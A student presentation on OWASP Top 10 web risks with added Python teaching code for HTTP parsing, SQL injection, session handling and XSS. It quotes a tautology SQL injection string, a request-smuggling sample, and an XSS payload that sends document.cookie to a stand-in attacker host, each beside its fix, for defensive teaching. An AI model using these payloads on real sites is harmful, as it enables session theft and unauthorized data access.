Web Application Security
CS200 PROJECT PRESENTATION
INSTRUCTOR: DR. FERDOUS AHMED
REFERENCE: HTTP://WWW.OWASP.ORG
Presented by:
Md Syed Ahamad
Topics
Introduction
Issues and solutions – OWASP
Problems analysis
Vulnerabilities
Preventions
Common Mistakes
Ways of approach
Vulnerabilities Scanner
Background
Many sensitive tasks are done through the web:
Online banking, online shopping, etc.
Database access
System administration
Web applications and web users are the targets of many attacks:
Network-based attacks
Injection
Broken Authentication and Session Management
Cross-site scripting
And many more…
Introduction
Web Application
The web browser communicates with the web server to retrieve web pages.
Client–server structure: the browser (client) sends requests, the server answers them.
Web Application Security
Deals specifically with the security of web applications themselves, as distinct from the security of the network they run on.
Fundamentals of Web Apps.
Uniform Resource Locator (URL)
Uniquely identifies the location of a web page.
Reveals the protocol in use (scheme), and often hints at the server OS and the web application technology (for example through file extensions such as .php or .aspx), and more.
URL manipulation (tampering with the path or query parameters) is a web application attack.
Fundamentals of Web Apps.
HTTP
Designates how the web browser and the web server communicate with each other.
Stateless protocol – a connection is established, a request is sent and a response is received; the server keeps no memory of the request afterwards, so any state (such as being logged in) has to be carried by the client on every request, usually in a cookie.
Post Data
The body of an HTTP request (as sent by POST).
Used when larger amounts of data need to be sent from the browser to the web server, e.g. form submissions.
Cookies
Small amount of data supplied by the web server and stored by the web browser, which sends it back with every later request to that server.
HTTP Request and Response
Request – method (GET, POST, …), target URL, headers, optional body
Response – status code, headers, body
Attacks on the HTTP layer
HTTP request smuggling
Cache poisoning
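To make the request/response structure concrete, here is a minimal HTTP/1.1 request parser and response builder. It is an added example, not code from the presentation (the deck's own snippets are Java; Python is used for all added examples on this page). It shows where the query string, the POST data and the Cookie header live in a request, and it refuses a request that carries both Content-Length and Transfer-Encoding, because two servers that resolve that ambiguity differently is what HTTP request smuggling exploits. Hosts, paths and cookie values are constructed.

```python
# Minimal HTTP/1.1 request parser and response builder (added example, not code
# from the presentation). Hosts, paths and cookie values below are constructed.
from dataclasses import dataclass
from http.cookies import SimpleCookie
from typing import Optional
from urllib.parse import parse_qs, urlsplit


@dataclass
class HttpRequest:
    method: str
    path: str
    query: dict      # query-string parameters, first value of each
    version: str
    headers: dict    # header names lower-cased
    cookies: dict    # parsed from the Cookie header
    body: bytes      # POST data: exactly Content-Length bytes


def parse_request(raw: bytes) -> HttpRequest:
    """Parse one request. Ambiguous body framing is rejected rather than guessed:
    a front end and a back end that guess differently is what makes HTTP request
    smuggling possible."""
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request: no end of headers")
    lines = head.decode("iso-8859-1").split("\r\n")
    try:
        method, target, version = lines[0].split(" ")
    except ValueError:
        raise ValueError(f"malformed request line: {lines[0]!r}") from None

    headers: dict = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        # RFC 7230: no whitespace allowed between the field name and the colon
        if not colon or not name or name != name.strip():
            raise ValueError(f"malformed header line: {line!r}")
        name, value = name.lower(), value.strip()
        if name not in headers:
            headers[name] = value
        elif name == "content-length":
            if headers[name] != value:
                raise ValueError("conflicting Content-Length values")
        else:
            headers[name] = f"{headers[name]}, {value}"

    if "transfer-encoding" in headers and "content-length" in headers:
        raise ValueError("ambiguous framing: both Transfer-Encoding and Content-Length")
    if "transfer-encoding" in headers:
        raise ValueError("chunked bodies are out of scope for this parser")
    length = int(headers.get("content-length", "0"))
    if length < 0 or len(rest) < length:
        raise ValueError("bad or truncated body")

    parts = urlsplit(target)
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    jar = SimpleCookie()
    jar.load(headers.get("cookie", ""))
    cookies = {k: m.value for k, m in jar.items()}
    return HttpRequest(method, parts.path, query, version, headers, cookies, rest[:length])


def form_fields(req: HttpRequest) -> dict:
    """Decode POST data sent as application/x-www-form-urlencoded."""
    if not req.headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        return {}
    return {k: v[0] for k, v in parse_qs(req.body.decode("utf-8")).items()}


def is_rejected(raw: bytes) -> bool:
    """True if parse_request refuses the request."""
    try:
        parse_request(raw)
        return False
    except ValueError:
        return True


def build_response(status: int, reason: str, body: bytes, set_cookie: Optional[str] = None) -> bytes:
    """Minimal HTTP/1.1 response with correct Content-Length framing."""
    head = [f"HTTP/1.1 {status} {reason}", "Content-Type: text/plain", f"Content-Length: {len(body)}"]
    if set_cookie:
        head.append(f"Set-Cookie: {set_cookie}")
    return ("\r\n".join(head) + "\r\n\r\n").encode("iso-8859-1") + body


# Constructed sample traffic.
GET_REQUEST = (b"GET /search?q=owasp&page=2 HTTP/1.1\r\n"
               b"Host: example.com\r\n"
               b"Cookie: SESSIONID=abc123; theme=dark\r\n\r\n")
POST_REQUEST = (b"POST /login HTTP/1.1\r\n"
                b"Host: example.com\r\n"
                b"Content-Type: application/x-www-form-urlencoded\r\n"
                b"Content-Length: 27\r\n\r\n"
                b"user=alice&password=s3cret!")
# Both framing headers at once: the shape used for request smuggling. Rejected.
AMBIGUOUS_REQUEST = (b"POST /upload HTTP/1.1\r\n"
                     b"Host: example.com\r\n"
                     b"Content-Length: 6\r\n"
                     b"Transfer-Encoding: chunked\r\n\r\n"
                     b"0\r\n\r\nG")
```

Note that the parser does not try to be lenient: conflicting or duplicated framing headers are errors, not warnings. Real servers that silently prefer one header over the other, while a proxy in front of them prefers the other, are exactly the pairs that smuggling and cache-poisoning attacks target.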
Fundamentals of Web Apps.
HTTPS
HTTP wrapped in Secure Sockets Layer (SSL) encryption, today its successor Transport Layer Security (TLS).
Data sent is encrypted.
Protects data in transit: confidentiality and integrity between browser and server.
Does not protect against application-level flaws such as injection or XSS; a malicious request is simply encrypted on its way to the vulnerable code.
Fundamentals of Web Apps.
Firewall
Prevents unauthorized connections to protected network devices.
Protects from network-based attacks.
Fails to protect against web-based attacks: the firewall has to let HTTP(S) traffic through to the web server, so injection, XSS and similar attacks travel inside connections it allows.
Issues – web-based attacks
OWASP
An online community dedicated to web application security.
It includes corporations, educational organizations, and individuals from around the world.
OWASP Top 10 – the most important document to discuss here.
Its goal is to raise awareness about application security by identifying some of the most critical risks facing organizations.
Analyse the problems clearly and solve them.
Application Security Risks
Attackers can use many different paths through an application to harm you.
Each path is a risk; how likely it is (threat agent, attack vector, weakness, security controls) and what its technical and business impact would be together determine the overall risk.
OWASP Top 10 (2013)
A1 – Injection
A2 – Broken Authentication and Session Management
A3 – Cross Site Scripting (XSS)
A4 – Insecure Direct Object References
A5 – Security Misconfiguration
A6 – Sensitive Data Exposure
A7 – Missing Function Level Access Control
A8 – Cross Site Request Forgery (CSRF)
A9 – Using Components with Known Vulnerabilities
A10 – Unvalidated Redirects and Forwards
A1 - Injection
Injection flaws – SQL, OS command, LDAP, etc.
Occur when untrusted data is sent to an interpreter as part of a command or query, so the data is executed as if it were part of the command.
Among the most prevalent and dangerous attacks on the Internet.
A1 - Injection
Vulnerabilities
Untrusted data is not clearly separated from the command or query the interpreter runs, typically because dynamic queries are built by string concatenation.
Easy to discover: code checking tools find concatenated queries, and penetration testers find them by supplying quote and comment characters as input.
Preventions
Use a safe API that avoids the interpreter entirely or provides a parameterized interface: prepared statements, or stored procedures (only if they do not build dynamic SQL themselves).
Avoid dynamic queries.
If a parameterized API is not available, carefully escape special characters using the escaping syntax of that specific interpreter.
Positive or "white list" input validation as defence in depth: reject input containing characters the field should never contain.
A1 – Injection
Example
Scenario #1: the application builds an SQL query by concatenating a request parameter into the query text:
String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";
Generic form: SELECT data FROM table WHERE email='<email_input>'; – whatever the user typed lands inside the quotes unchanged, so a quote character in the input becomes SQL syntax.
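The following added example (not code from the presentation or from OWASP) reproduces Scenario #1 against an in-memory SQLite database, so the effect of the concatenation can be observed and compared with the prepared-statement fix and the white-list validation from the previous slide. The accounts table and its rows are constructed sample data; the payload is the classic tautology that closes the quote and appends an always-true condition.

```python
# SQL injection: the concatenated query from Scenario #1 beside its fix.
# Added example, not code from the presentation. Table and rows are constructed.
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database with a constructed accounts table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (custID TEXT PRIMARY KEY, owner TEXT, balance INTEGER)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [("1001", "alice", 500), ("1002", "bob", 1200), ("1003", "carol", 75)],
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, cust_id: str) -> list:
    """Python equivalent of the Java line on the slide: the parameter value is
    pasted into the SQL text, so quote characters in it become SQL syntax."""
    query = "SELECT * FROM accounts WHERE custID='" + cust_id + "'"
    return conn.execute(query).fetchall()


def safe_lookup(conn: sqlite3.Connection, cust_id: str) -> list:
    """Prepared statement: the driver passes the value separately from the
    query text, so the interpreter never reads it as SQL."""
    return conn.execute("SELECT * FROM accounts WHERE custID=?", (cust_id,)).fetchall()


def validate_cust_id(cust_id: str) -> bool:
    """Positive ("white list") validation: a customer ID is 1-10 digits and
    nothing else. Defence in depth on top of parameterization, not a substitute."""
    return re.fullmatch(r"[0-9]{1,10}", cust_id) is not None


# Constructed attacker input: closes the quote and appends an always-true clause,
# turning the filter into  custID='' OR '1'='1'  and returning every row.
TAUTOLOGY_PAYLOAD = "' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("legit :", vulnerable_lookup(db, "1002"))
    print("attack:", vulnerable_lookup(db, TAUTOLOGY_PAYLOAD))   # every account
    print("fixed :", safe_lookup(db, TAUTOLOGY_PAYLOAD))          # no rows
```

The safe version returns nothing for the payload because SQLite compares the column against the literal string `' OR '1'='1`, which no customer ID equals; the query text never changed. Escaping would also have worked here, but it has to be redone correctly for every interpreter, whereas parameterization removes the problem.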
A2 – Broken Authentication and
Session Management
Application functions related to authentication and session management are often not implemented correctly.
This lets attackers compromise passwords, keys or session tokens, or exploit other implementation flaws to assume other users' identities.
A2 – Broken Authentication and
Session Management Vulnerabilities
User credentials are not protected when stored (no hashing or encryption).
Credentials can be guessed or overwritten through weak account management functions (account creation, change password, password recovery).
Session IDs are exposed in the URL, don't time out, aren't rotated after login, etc.
Preventions
Meet the authentication and session management requirements of OWASP's Application Security Verification Standard (ASVS).
Give developers a single, simple set of strong authentication and session management controls.
Make a strong effort to avoid XSS flaws, which can be used to steal session IDs.
A2 – Broken Authentication and
Session Management
Example
Scenario #1: An airline reservations application supports URL rewriting, putting session IDs in the URL:
http://example.com/sale/saleitems;jsessionid=2P0OC2JSNDLPSKHCJUN2JV?dest=Hawaii
Because the session ID is part of the URL, anyone who sees the link (shared by the user, left in browser history or proxy logs, or leaked in a Referer header) can reuse the session.
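As an added example (not code from the presentation), the following Python module shows the controls the previous two slides call for: credentials stored as salted PBKDF2 hashes rather than in clear, session IDs drawn from a cryptographic random source, rotation of the ID at login, an idle timeout, and delivery of the ID in a cookie with HttpOnly and Secure set instead of in the URL as in Scenario #1. The cookie name, the timeout and the PBKDF2 parameters are this example's choices, not requirements from the slides.

```python
# Session management and credential storage for A2 (added example, not code from
# the presentation). Cookie name, timeout and PBKDF2 parameters are example choices.
import hashlib
import hmac
import os
import secrets
import time
from typing import Optional

IDLE_TIMEOUT_SECONDS = 15 * 60


def hash_password(password: str, iterations: int = 600_000) -> str:
    """Store a salted PBKDF2-HMAC-SHA256 hash, never the password itself."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    _algo, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    # constant-time comparison: no timing hint about how many bytes matched
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


class SessionStore:
    """Server-side sessions keyed by an unguessable random ID. The clock is an
    explicit argument (monotonic seconds) so the timeout can be tested."""

    def __init__(self, idle_timeout: float = IDLE_TIMEOUT_SECONDS):
        self.idle_timeout = idle_timeout
        self._sessions: dict = {}

    def create(self, now: Optional[float] = None) -> str:
        now = time.monotonic() if now is None else now
        sid = secrets.token_urlsafe(32)          # 256 bits from the OS CSPRNG
        self._sessions[sid] = {"user": None, "last_seen": now}
        return sid

    def get(self, sid: str, now: Optional[float] = None) -> Optional[dict]:
        """Return the session, or None if unknown or idle too long. Expired
        sessions are deleted so a stale ID can never be revived."""
        now = time.monotonic() if now is None else now
        sess = self._sessions.get(sid)
        if sess is None:
            return None
        if now - sess["last_seen"] > self.idle_timeout:
            del self._sessions[sid]
            return None
        sess["last_seen"] = now
        return sess

    def login(self, old_sid: str, user: str, now: Optional[float] = None) -> str:
        """Rotate the session ID on login: the pre-login ID, which an attacker may
        have fixed or observed, is destroyed and a fresh one is bound to the user."""
        self._sessions.pop(old_sid, None)
        new_sid = self.create(now)
        self._sessions[new_sid]["user"] = user
        return new_sid

    def logout(self, sid: str) -> None:
        self._sessions.pop(sid, None)


def set_cookie_header(sid: str) -> str:
    """Carry the ID in a cookie, not in the URL. HttpOnly keeps it out of
    document.cookie (the XSS scenario later in the deck), Secure keeps it off plain
    HTTP, SameSite=Lax stops most cross-site requests from carrying it."""
    return f"Set-Cookie: SESSIONID={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"
```

The rotation in `login` is the direct answer to the "don't rotate after login" weakness: even if the pre-login ID leaked through a URL like the one in Scenario #1, it is worthless once the user authenticates.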
A3 – Cross Site Scripting
XSS occurs when an application sends untrusted data to a web browser without proper validation or escaping, so attacker-supplied script runs in the victim's browser (hijacking sessions, defacing pages, redirecting users).
Three types: stored, reflected and DOM-based.
A3 – Cross Site Scripting
Example
The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:
(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
The attacker modifies the 'CC' parameter in the browser to:
'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'
The leading '> closes the value attribute and the input tag, so the script that follows runs in the victim's browser and sends the session cookie to the attacker's site.
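The added example below (not code from the presentation) renders the snippet from the slide in Python twice, once with the raw parameter as on the slide and once with the value escaped for the attribute context, and then feeds both through an HTML parser to show what the browser would see: two tags (input and script) in the first case, a single input whose value is the harmless literal payload in the second. The payload and the attacker host are exactly as quoted on the slide.

```python
# Reflected XSS from the A3 example: unescaped snippet beside the escaped one,
# checked with an HTML parser. Added example, not code from the presentation.
import html
from html.parser import HTMLParser


def vulnerable_render(cc: str) -> str:
    """Python equivalent of the Java line on the slide: the parameter is
    concatenated into a single-quoted attribute value unescaped."""
    return "<input name='creditcard' type='TEXT' value='" + cc + "'>"


def safe_render(cc: str) -> str:
    """Escape for the HTML attribute context. html.escape(quote=True) turns
    < > & " and ' into character references, so the value can neither close
    the attribute nor open a new tag."""
    return "<input name='creditcard' type='TEXT' value='" + html.escape(cc, quote=True) + "'>"


class TagCollector(HTMLParser):
    """Record every start tag with its (entity-decoded) attributes, i.e. the
    DOM a browser would build from the markup."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup: str) -> list:
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


# Attacker-controlled 'CC' parameter, as quoted on the slide.
XSS_PAYLOAD = ("'><script>document.location="
               "'http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'")

if __name__ == "__main__":
    print([tag for tag, _ in parse_tags(vulnerable_render(XSS_PAYLOAD))])  # input and script
    print([tag for tag, _ in parse_tags(safe_render(XSS_PAYLOAD))])        # input only
```

Escaping is context-specific: this escaping is right for an attribute value delimited by quotes, but data placed inside a `<script>` block, a URL or a CSS property needs the rules of that context. The HttpOnly flag on the session cookie (see the A2 controls) would stop this particular payload from reading document.cookie, but it does not fix the XSS itself.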
Ways of approach
SSL/TLS for all traffic
Website vulnerability scanners
Types
Network scanner
Port scanner
Web application security scanner
Vulnerability Scanner
Acunetix Web Vulnerability Scanner
Cenzic Hailstorm
GFI LANguard Network Security Scanner
Tenable Nessus
Nmap
QualysGuard
Retina Network Security Scanner
SAINT Network Vulnerability Scanner